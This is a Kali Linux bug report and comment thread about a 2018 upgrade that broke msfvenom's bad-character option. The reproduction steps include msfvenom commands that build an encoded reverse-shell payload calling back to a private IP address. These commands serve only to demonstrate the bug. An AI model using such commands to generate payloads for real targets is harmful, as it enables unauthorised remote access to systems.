2018-07-16 04:45 UTC

View Issue Details Jump to Notes ]
IDProjectCategoryView StatusLast Update
0004690Kali Linux[All Projects] Kali Package Bugpublic2018-04-12 10:48
Reporteralexander 
Assigned Tosbrun 
PriorityurgentSeveritymajorReproducibilityalways
StatusresolvedResolutionfixed 
Product Version2018.1 
Target VersionFixed in Version 
Summary0004690: Latest upgrade of Kali breaks msfvenom's support for bad characters
Description
Linux kali 4.15.0-kali2-686 0000001 SMP Debian 4.15.11-1kali1 (2018-03-21) i686 GNU/Linux

Last dist-upgrade:
9th April 2018

Error message:
/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
Steps To Reproduce
Broken:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.85 LPORT=443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Works fine:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.85 LPORT=443 -f c -e x86/shikata_ga_nai
Attached Files

-Relationships
+Relationships

-Notes

~0009013

alexander (reporter)

https://github.com/rapid7/metasploit-framework/issues/9820

~0009016

g0tmi1k (administrator)

"Addressed in https://github.com/rapid7/metasploit-framework/issues/8200/ / https://github.com/rapid7/metasploit-framework/issues/8210, there are also workarounds there until Kali picks it up."

..Not sure what Kali is meant to pick up?

~0009024

rhertzog (administrator)

Kali will pick up the fix when it packages the next release. Usually at the end the week.

~0009032

alexander (reporter)

Seems fixed now with an apt-get upgrade.

Thank you :D!

~0009033

g0tmi1k (administrator)

4.16.49 is out ~ http://git.kali.org/gitweb/?p=packages/metasploit-framework.git;a=log;h=refs/heads/kali/master
+Notes

-Issue History
Date Modified Username Field Change
2018-04-09 20:33 alexander New Issue
2018-04-09 20:35 alexander Note Added: 0009013
2018-04-10 11:25 g0tmi1k Note Added: 0009016
2018-04-10 20:01 rhertzog Note Added: 0009024
2018-04-12 09:46 alexander Note Added: 0009032
2018-04-12 10:48 g0tmi1k Assigned To => sbrun
2018-04-12 10:48 g0tmi1k Status new => resolved
2018-04-12 10:48 g0tmi1k Resolution open => fixed
2018-04-12 10:48 g0tmi1k Note Added: 0009033
+Issue History